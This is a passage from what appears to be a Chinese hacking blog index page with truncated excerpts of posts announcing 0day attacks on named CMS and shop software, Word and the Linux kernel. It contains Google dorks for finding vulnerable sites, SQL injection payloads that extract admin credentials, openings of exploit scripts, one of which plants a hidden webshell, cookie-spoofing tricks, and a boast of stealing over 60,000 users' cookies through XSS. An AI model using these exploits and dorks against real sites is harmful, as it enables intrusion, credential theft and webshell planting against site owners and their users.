建站之星SiteStar V2.0 漏洞由大牛云集的t00ls会员“Odays村长”发现并公布。 建站之星的V1.3版本前一段时间才被爆出一个fckeditor的上传漏洞，现在又被t00ls的牛爆出一个漏洞。 上图： 这次建站之星SiteStar...

...

...

又是t00ls传出来的，t00ls牛人可真多。 关键词 inurl:ask/show.php 安装phpnow，当然别的软件也可以，反正就是需要配置一个本机PHP环境，这个很重要！ yp为企业黄页所放置的目录 下面为EXP 第一个exp <?php ini_set("max_execution_time",0); error_reporting(7); function usage() { global $argv; exit( "\n--+++============================================================+++--". "\n--+++======...

http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC# goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filte r_attr=-999 Test it : http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC% 23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&fil ter_attr=-999%20OR%20length(session_user())=14%20or%201=2...

作者:Lan3a 第一： 管理员目录下的Admin_Passod.asp <!–#include file=”../Include/conn.asp”–> <!–#include file=”../Include/md5.asp”–> <% select case request.QueryString(“Action”) case “ModifyPass” SaveNewPass case else end select set rs = server.createobject(“adodb.recordset”) sql=”select * from Lelv_w_manage order by id desc” rs.open...

官方暂时没出补丁,不过我估计快了 执行成功会在在data/cache下生成t.php一句话小马 密码t,官方最新GBK和utf-8版本存在此漏洞, 此exp的特点是生成t.php得时候不留日志 <?php print_r(‘ +—————————————-+ dedecms v5.5 final getwebshell...

ESCMS cookies欺骗0day 版本:ESCMS V1.0 SP1 Build 1125 后台登陆验证是通过admin/check.asp实现的,看代码 <% if Request.cookies(CookiesKey)(“ES_admin”)=”" then ”注意这里哦,他是通过COOKIE验证ES_admin是否为空,我们可以伪造一个值,叫他不为空 ”CookiesKey在inc/ESCMS_Config.asp文件中,默认为ESCMS$_SP2 Call Err_Show() Response.End() End...

t00ls总是能看见不错的东西：http://www.t00ls.net/thread-6120-1-1.html 本大王在这里下载的：http://www.3est.com/thread-2287-1-1.html Word 0day漏洞，主要针对word2003(成功率几乎100%), 以及部分word xp+sp3、word 2000(成功率60%左右) Word 2003是重头， 其实该漏洞与系统补丁基本没关系。...

        白大王友情提示：非法入侵会免费享受躲猫猫游戏，提供免费啃窝窝头的机会。
谷歌工程师首发：windows最新0day 本地提谷歌果然卧虎藏龙，存在17年的漏洞编译至今通杀。

来源：http://www.t00ls.net/thread-5608-1-1.html 白大王友情提示：非法入侵会被喊过去吃窝窝头，玩躲猫猫。 文/My5t3ry 昨天看到论坛上有朋友问CitySHOP后台如何拿SHELL，就下了源码回来读了下，发现代码用zend加密了。 解密后读了下，漏洞还真不少，很多参数都是$_GET后就直接带入sql查询，如： 上面的代码这句$chknum = $conn->query( “SELECT goodshit...

同样来源于：http://yxmhero1989.blog.163.com/，大家小心点，已经说过很多次了，反正本大王不想吃窝窝头，玩躲猫猫。 Author:Minghacker From：www.3est.com Blog:http://yxmhero1989.blog.163.com 貌似有新旧版本。 看代码sub_uploadb.asp <%@language=VBScript%> <!–#include FILE=”upload.inc”–> <% dim upload,file,formName,formPath,iCount,fileformat set upload=new...

白大王友情提示：非法入侵网站会遭遇躲猫猫和吃窝窝头，大家自重。 第一种方法： 先注册个用户然后把 <form method=”post” action=”   http://www.xxx.com/bbs/misc.php” enctype=”multipart/form-data”> 帖子ID，指定一个存在的帖子即可：<input type=”text” name=”tid” value=”1″ /> <input type=”hidden” name=”action” value=”imme_binding”...

漏洞原因：IIS6.0解析漏洞，Upload_user.aspx可以选择不对上传文件重命名，导致漏洞产生。（希望有此漏洞的朋友赶紧修补） 暗链代码参考此文：一切为了暗链，菜鸟跟我一起来ASP手工注入 演示开始： 目标站点，风讯官方演示站...

...

        剩蛋快乐……大家一起乐吧。

很垃圾的！
无聊看了下，ShopWind
很多注入点的，还有 cookie欺骗等等！
相信很多人都发现了这个注入，只是没发出来而已。

在news.asp里发现了，id这个变量没过滤，没做任何防范措施。

item_news.asp里定义了变量id文件如下：
...

剩蛋大礼，虽然很多网站已经在转载了，本大王还是贴出来大家看看吧。 Author:Minghacker From:http://www.3est.com Blog: http://yxmhero1989.blog.163.com PHPMPS ,主站http://www.phpmps.com/有下载。v2.0正式版GBK 和...

【白银时代】备注：我没学过Linux，所以没有发言权…… Linux内核漏洞最近几乎是一月一爆，在8月15号才爆了一个几乎通杀所有版本所有内核所有架构的内核漏洞；今天在学生返校的大喜日子里，竟然又爆了一个，通杀内核2.6 < 2.6.19的所有32位Linux，算是google security team给祖国学生的礼物吧。 linux的一个localroot，IIS5/6 FTP的remote...

【白银时代】备注：杀伤力巨大…… 关键字：inurl:/xqgslist.asp 点开新闻或者文章，随意点开一个页面。   注入语句：xor 1=2 union select 1,2,adminname,adminpwd,5 from...

【白银时代】备注：天阳看见有人发了，果然很猛。原帖地址：http://bbs.tian6.com/thread-14470-1-1.html 今天测试了下~ （ps：CSDN的童鞋不要怪我哈~ 你们的密码我都没乱扔）几分钟后盗了60多K的cookies~ 登陆了下~ 都可以，XXS还是挺好玩儿的~ ，手下留情没有弄管理员~ 所以就不要说我有什么企图了~ 完全没有的~...